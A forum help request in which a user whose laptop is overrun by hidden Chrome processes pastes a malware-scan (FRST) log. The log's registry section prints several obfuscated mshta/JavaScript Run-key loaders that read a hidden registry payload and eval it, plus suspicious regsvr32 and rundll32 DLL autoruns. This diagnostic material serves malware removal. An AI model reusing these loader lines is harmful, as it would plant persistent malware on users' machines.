Laptop/Chrome Virus Issue [Solved]


#1 xander291190 (Member, 13 posts)

Hi,

This is my first time posting to the forum, so firstly my apologies if I have posted in the wrong area. My friend recommended the forum to try and solve my problem. I have read the Malware and Spyware and have run the software; I have pasted the reports at the end. Furthermore, I have screenshots available upon request showing my Task Manager and the problem described below.

My issue appears to be some sort of virus/malware/spyware that affects my Google Chrome and system processing. It started a few days ago when I noticed my laptop running very slow and freezing constantly. I checked my Task Manager and noticed the CPU and memory were almost at 100%, due to as many as 15 different processes all related to Chrome, without having the browser open.

I'm aware Chrome functions differently with its processes compared to other browsers, but after expanding a few of them I noticed some of them were very strange. There were multiple 'New tab' processes (again, the browser was not open on my desktop), but the most concerning ones were named 'video-promo.org'.

I have tried to end all the processes, but they quickly start again. I have run various programs that claim to remove any malware or spyware, but the problem continues. The only thing that seemed to work was when I somehow managed to uninstall Chrome; the laptop then worked fine. However, when Chrome was reinstalled the problem started exactly as before.

I'm stuck with what to do next, and any help that you guys can provide will be much appreciated.

Thanks in advance!

Reports:

FRST:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-08-2015
Ran by user (administrator) on HP (03-09-2015 08:22:52)
Running from C:\Users\user\Downloads
Loaded Profiles: user (Available Profiles: user)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Program Files\ATI Technologies\ATI.ACE\a4\AdaptiveSleepService.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(BitTorrent Inc.) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
() C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
Failed to access process -> WerFault.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wsqmcons.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Failed to access process -> SearchProtocolHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7535832 2014-02-13] (Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [704344 2015-02-05] (Alps Electric Co., Ltd.)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-29] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-29] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-29] (Hewlett-Packard)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-18] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [1045304 2013-10-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe [40184 2015-02-27] (Panda Security, S.L.)
HKLM-x32\...\Run: [**218bad7d<*>] => mshta javascript:iyQT4VY="CK3O";V67s=new%20ActiveXObject("WScript.Shell");FY0Tn0JM="2iHgm";xV2Ij2=V67s.RegRead("HKLM\\software\\Wow6432Node\\fa4c9d5698\\0d3cffd4");VZi3hnSgk9="pVE";eval(xV2Ij2);Z5fWFm (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Winlogon: [Userinit] C:\Windows\SysWOW64\userinit.exe,
HKLM\...\Policies\Explorer\Run: [1853556740] => C:\ProgramData\msbogj.exe [76288 2015-06-16] ()
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [uTorrent] => C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe [1696096 2015-08-28] (BitTorrent Inc.)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2899136 2015-08-20] (Valve Corporation)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**218bad7d<*>] => mshta javascript:W9aS1KCR="UUw4";y9o8=new%20ActiveXObject("WScript.Shell");Vc5AeYFkq="MOb";q6p3jI=y9o8.RegRead("HKCU\\software\\fa4c9d5698\\0d3cffd4");KZf98Edu="zLL";eval(q6p3jI);IcaPSE6="4ifrZ3"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**c1b2a7eb<*>] => mshta javascript:gF0Iv2HVDd="a";A8e=new%20ActiveXObject("WScript.Shell");g7SKg0Rg="IcEJFbpa";J1oi1c=A8e.RegRead("HKCU\\software\\7e31c7fb1f\\121bdb0c");w9gONqNan6="GHrQ";eval(J1oi1c);ZAiqko6="z9mBn9"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**da02f0de<*>] => mshta javascript:fxZCP3i="kxqXBLRASQ";y4I9=new%20ActiveXObject("WScript.Shell");mA3WxwAa="o";l5rWG0=y4I9.RegRead("HKCU\\software\\7e31c7fb1f\\121bdb0c");K8L5tFFO="2tv";eval(l5rWG0);Tq2YCV1mv="hiPfYH6" (the data entry has 1 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [YbPack] => regsvr32.exe C:\Users\user\AppData\Local\YbPack\comNetengine.dll <===== ATTENTION
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Eqtion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Ufrmedia\frivolled.dll
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [GoogleUpdate] => C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe [62042624 2015-09-03] ()
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [FireFoxUpdServeisSystem] => C:\Users\user\AppData\Roaming\FireFoxUpdServeis\[email protected] [66560 2015-09-02] ()
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Update] => C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe [62042624 2015-09-03] ()
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [xzhw] => rundll32 "C:\Users\user\AppData\Roaming\scrrunp.dll",obtmokiq
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0E2E738C-AA2B-43E7-AC64-518FDCB854EF}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14
HKU\S-1-5-21-934653896-176862922-3437185597-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14
HKU\S-1-5-21-934653896-176862922-3437185597-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14
SearchScopes: HKU\S-1-5-21-934653896-176862922-3437185597-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
